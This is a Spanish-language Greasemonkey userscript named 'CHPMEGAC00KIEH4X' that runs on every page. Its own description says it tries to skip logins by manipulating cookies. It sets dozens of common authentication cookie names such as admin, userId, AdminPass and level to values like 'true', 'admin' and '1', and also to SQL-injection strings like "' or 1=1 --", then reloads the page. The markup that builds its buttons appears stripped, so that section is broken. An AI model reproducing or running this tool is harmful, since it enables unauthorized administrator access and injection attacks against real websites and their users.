// ==UserScript==
// @name CHPMEGAC00KIEH4X
// @namespace http://xd-blog.com.ar/
// @description Trata de saltearse logins manipulando las cookies
// @include *
// ==/UserScript==
// V 1.0
// // // // // // // // // // // // // // // // // // // // // // // // //
// Autor: seth (xd dot seth at gmail dot com, http://xd-blog.com.ar/) //
// Contribuciones: The X-C3LL (http://0verl0ad.blogspot.com/) //
// // // // // // // // // // // // // // // // // // // // // // // // //
// Queres ayudar? Entrá a http://osvdb.org/search?search[vuln_title]=Cookie+Manipulation&search[text_type]=titles y buscá los nombres y valores de las cookies
//Metemos el div con los botones
var str = '';
for (var i=0; i<13; i++){
str = str + '
';
};
var div = document.createElement("div");
div.innerHTML = '' + str + '
';
document.body.appendChild(div);
//La funcion que crea las cookies
function mandale_mecha(valor){
nombres = ['admin', 'logueado', 'loged', 'user', 'usuario', 'userId', 'loggedon', 'adm', 'login_admin', 'AdminPass', 'Auth', 'Name', 'level', 'logged', 'admin_log',
'adminLoggedIn', 'myadminname', 'awse_logged', 'authuser', 'group_id', 'lvl', 'membercookie', 'memberid'];
valores = ['true', 'yes', 'si', '1', 'admin', 'administrador', 'administrator', 'OK', 'right', 'logged', 'in', ' or 1=1', '\' or 1=1 -- '];
var exdate = new Date();
exdate.setDate(exdate.getDate() + 1);
for each (nombre in nombres){
var c_value = escape(valores[valor]) + "; expires="+exdate.toUTCString();
document.cookie = nombre + "=" + c_value;
}
location.reload();
}
// http://stackoverflow.com/questions/5006460/userscripts-greasemonkey-calling-a-websites-javascript-functions/5006576#5006576
function addFunction(func, exec) {
var script = document.createElement("script");
script.textContent = (exec ? "(" : "") + func.toString() + (exec ? ")();" : "");
document.body.appendChild(script);
}
//Metemos la funcion en la pagina para que pueda ser llamada por onclick
addFunction(mandale_mecha, false);